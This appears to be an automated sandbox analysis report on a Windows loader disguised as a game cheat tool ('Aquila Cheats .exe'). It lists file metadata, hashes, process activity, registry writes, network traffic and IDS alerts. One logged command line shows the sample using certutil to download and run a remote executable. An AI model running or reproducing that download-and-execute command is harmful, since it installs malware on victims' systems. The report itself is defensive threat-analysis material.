File name: | Aquila Cheats .exe |
Full analysis: | https://app.any.run/tasks/7bfd2dae-e430-4dda-8361-60c8c05e3c2e |
Verdict: | Malicious activity |
Threats: | A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. |
Analysis date: | August 25, 2019, 16:04:49 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/x-dosexec |
File info: | PE32 executable (GUI) Intel 80386, for MS Windows |
MD5: | 6D3E24FAD2622AB2528885506A5DFBAD |
SHA1: | 80D8FE0C689A1A5E2C8F537340D9415EC79FA289 |
SHA256: | BCB565D52E5F61CB02DD8FC45C34E4CF487DD68BD50E421C7122A76E625B74F5 |
SSDEEP: | 3072:rBBT19PQplqQA/lf+o7/b8pzFZ7GwCuRw1usPynJaH9HXjJJ2pW:rLTHQOrRezFWuRwIDnJs3jLuW |
.exe | | | Generic Win/DOS Executable (50) |
---|---|---|
.exe | | | DOS Executable Generic (49.9) |
SpecialBuild: | - |
---|---|
PrivateBuild: | - |
Comments: | - |
ProductVersion: | - |
FileVersion: | - |
OriginalFileName: | - |
ProductName: | - |
InternalName: | - |
LegalTrademarks: | - |
LegalCopyright: | - |
FileDescription: | - |
CompanyName: | - |
CharacterSet: | Unicode |
LanguageCode: | Russian |
FileSubtype: | - |
ObjectFileType: | Unknown |
FileOS: | Win32 |
FileFlags: | (none) |
FileFlagsMask: | 0x0000 |
ProductVersionNumber: | 0.0.0.0 |
FileVersionNumber: | 0.0.0.0 |
Subsystem: | Windows GUI |
SubsystemVersion: | 4 |
ImageVersion: | - |
OSVersion: | 4 |
EntryPoint: | 0x1942f |
UninitializedDataSize: | - |
InitializedDataSize: | 45056 |
CodeSize: | 101888 |
LinkerVersion: | 8 |
PEType: | PE32 |
TimeStamp: | 2012:12:31 01:38:51+01:00 |
MachineType: | Intel 386 or later, and compatibles |
Architecture: | IMAGE_FILE_MACHINE_I386 |
---|---|
Subsystem: | IMAGE_SUBSYSTEM_WINDOWS_GUI |
Compilation Date: | 31-Dec-2012 00:38:51 |
Detected languages: |
|
CompanyName: | - |
FileDescription: | - |
LegalCopyright: | - |
LegalTrademarks: | - |
InternalName: | - |
ProductName: | - |
OriginalFilename: | - |
FileVersion: | - |
ProductVersion: | - |
Comments: | - |
PrivateBuild: | - |
SpecialBuild: | - |
Magic number: | MZ |
---|---|
Bytes on last page of file: | 0x0060 |
Pages in file: | 0x0001 |
Relocations: | 0x0000 |
Size of header: | 0x0004 |
Min extra paragraphs: | 0x0000 |
Max extra paragraphs: | 0xFFFF |
Initial SS value: | 0x0000 |
Initial SP value: | 0x00B8 |
Checksum: | 0x0000 |
Initial IP value: | 0x0000 |
Initial CS value: | 0x0000 |
Overlay number: | 0x0000 |
OEM identifier: | 0x0000 |
OEM information: | 0x0000 |
Address of NE header: | 0x00000060 |
Signature: | PE |
---|---|
Machine: | IMAGE_FILE_MACHINE_I386 |
Number of sections: | 4 |
Time date stamp: | 31-Dec-2012 00:38:51 |
Pointer to Symbol Table: | 0x00000000 |
Number of symbols: | 0 |
Size of Optional Header: | 0x00E0 |
Characteristics: |
|
Name | Virtual Address | Virtual Size | Raw Size | Charateristics | Entropy |
---|---|---|---|---|---|
.text | 0x00001000 | 0x00018DDE | 0x00018E00 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ | 6.67402 |
.rdata | 0x0001A000 | 0x00003BCA | 0x00003C00 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 5.71339 |
.data | 0x0001E000 | 0x00004DEC | 0x00000A00 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 4.45098 |
.rsrc | 0x00023000 | 0x000068D8 | 0x00006A00 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 3.88737 |
Title | Entropy | Size | Codepage | Language | Type |
---|---|---|---|---|---|
1 | 5.23138 | 838 | Latin 1 / Western European | English - United States | RT_MANIFEST |
2 | 2.60602 | 744 | Latin 1 / Western European | Russian - Russia | RT_ICON |
3 | 2.63074 | 488 | Latin 1 / Western European | Russian - Russia | RT_ICON |
4 | 2.3817 | 296 | Latin 1 / Western European | Russian - Russia | RT_ICON |
52 | 3.50538 | 21640 | Latin 1 / Western European | Russian - Russia | RT_ICON |
101 | 2.0815 | 20 | Latin 1 / Western European | Russian - Russia | RT_GROUP_ICON |
ADVAPI32.dll |
COMCTL32.dll |
GDI32.dll |
KERNEL32.dll |
MSVCRT.dll |
OLEAUT32.dll |
SHELL32.dll |
USER32.dll |
ole32.dll |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3432 | "C:\Users\admin\AppData\Local\Temp\Aquila Cheats .exe" | C:\Users\admin\AppData\Local\Temp\Aquila Cheats .exe | — | explorer.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2768 | "C:\Windows\System32\certutil.exe" -urlcache -f -split http://cdn.filesend.jp/private/fjIVSvCCNeBTcGkM6n4U55boFywztrZoYLoLpbA8oAmQFD4BmbcxXA-cObhP3bA8/%23.exe red.exe | C:\Windows\System32\certutil.exe | Aquila Cheats .exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: CertUtil.exe Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
4088 | "C:\Windows\system32\taskmgr.exe" /4 | C:\Windows\system32\taskmgr.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Task Manager Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2824 | "C:\Windows\system32\taskmgr.exe" /1 | C:\Windows\system32\taskmgr.exe | taskmgr.exe | |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Task Manager Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3008 | "C:\Users\admin\AppData\Local\Temp\7ZipSfx.000\red.exe" | C:\Users\admin\AppData\Local\Temp\7ZipSfx.000\red.exe | — | Aquila Cheats .exe |
User: admin Company: Intel System Private Integrity Level: MEDIUM Description: Intel System Private Exit code: 0 Version: 6.0.1.0 |
(PID) Process: | (3432) Aquila Cheats .exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 0 | |||
(PID) Process: | (3432) Aquila Cheats .exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | AutoDetect |
Value: 1 | |||
(PID) Process: | (2768) certutil.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\certutil_RASAPI32 |
Operation: | write | Name: | EnableFileTracing |
Value: 0 | |||
(PID) Process: | (2768) certutil.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\certutil_RASAPI32 |
Operation: | write | Name: | EnableConsoleTracing |
Value: 0 | |||
(PID) Process: | (2768) certutil.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\certutil_RASAPI32 |
Operation: | write | Name: | FileTracingMask |
Value: 4294901760 | |||
(PID) Process: | (2768) certutil.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\certutil_RASAPI32 |
Operation: | write | Name: | ConsoleTracingMask |
Value: 4294901760 | |||
(PID) Process: | (2768) certutil.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\certutil_RASAPI32 |
Operation: | write | Name: | MaxFileSize |
Value: 1048576 | |||
(PID) Process: | (2768) certutil.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\certutil_RASAPI32 |
Operation: | write | Name: | FileDirectory |
Value: %windir%\tracing | |||
(PID) Process: | (2768) certutil.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\certutil_RASMANCS |
Operation: | write | Name: | EnableFileTracing |
Value: 0 | |||
(PID) Process: | (2768) certutil.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\certutil_RASMANCS |
Operation: | write | Name: | EnableConsoleTracing |
Value: 0 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2768 | certutil.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@filesend[1].txt | text | |
MD5:5A471B7BA4BB1D12B30849CF4E3E6215 | SHA256:FDDC68AED106BC81C90160C2A473526E75F716147D7148546CB0FE302D5B5F4D | |||
2768 | certutil.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\9470371325B164338A01B45C5F5DECDC | binary | |
MD5:D8BDAD876C224BF7667DF2C8CA982F71 | SHA256:E557E35CE981E659A0B173C517D1E442A41D35AFA6492D1DA6C5C737F809E176 | |||
2768 | certutil.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\%23[1].exe | executable | |
MD5:5F5A71F14779B7EC0A9307418A678B47 | SHA256:AA2CB2FE4ED8BB925A397B82FC03C00D60BF559A7A9978F3AC68D8A40D45EF0D | |||
2768 | certutil.exe | C:\Users\admin\AppData\Local\Temp\7ZipSfx.000\red.exe | executable | |
MD5:5F5A71F14779B7EC0A9307418A678B47 | SHA256:AA2CB2FE4ED8BB925A397B82FC03C00D60BF559A7A9978F3AC68D8A40D45EF0D | |||
2768 | certutil.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\9470371325B164338A01B45C5F5DECDC | executable | |
MD5:5F5A71F14779B7EC0A9307418A678B47 | SHA256:AA2CB2FE4ED8BB925A397B82FC03C00D60BF559A7A9978F3AC68D8A40D45EF0D | |||
2768 | certutil.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\IETldCache\index.dat | dat | |
MD5:D7A950FEFD60DBAA01DF2D85FEFB3862 | SHA256:75D0B1743F61B76A35B1FEDD32378837805DE58D79FA950CB6E8164BFA72073A |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2768 | certutil.exe | GET | 200 | 104.26.0.235:80 | http://cdn.filesend.jp/private/fjIVSvCCNeBTcGkM6n4U55boFywztrZoYLoLpbA8oAmQFD4BmbcxXA-cObhP3bA8/%23.exe | US | executable | 1.67 Mb | suspicious |
2768 | certutil.exe | GET | 200 | 104.26.1.235:80 | http://cdn.filesend.jp/private/fjIVSvCCNeBTcGkM6n4U55boFywztrZoYLoLpbA8oAmQFD4BmbcxXA-cObhP3bA8/%23.exe | US | executable | 1.67 Mb | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2768 | certutil.exe | 104.26.1.235:80 | cdn.filesend.jp | Cloudflare Inc | US | shared |
2768 | certutil.exe | 104.26.0.235:80 | cdn.filesend.jp | Cloudflare Inc | US | shared |
Domain | IP | Reputation |
---|---|---|
cdn.filesend.jp |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
2768 | certutil.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2768 | certutil.exe | Misc activity | SUSPICIOUS [PTsecurity] Observed MS Certutil User-Agent in HTTP Request |
2768 | certutil.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |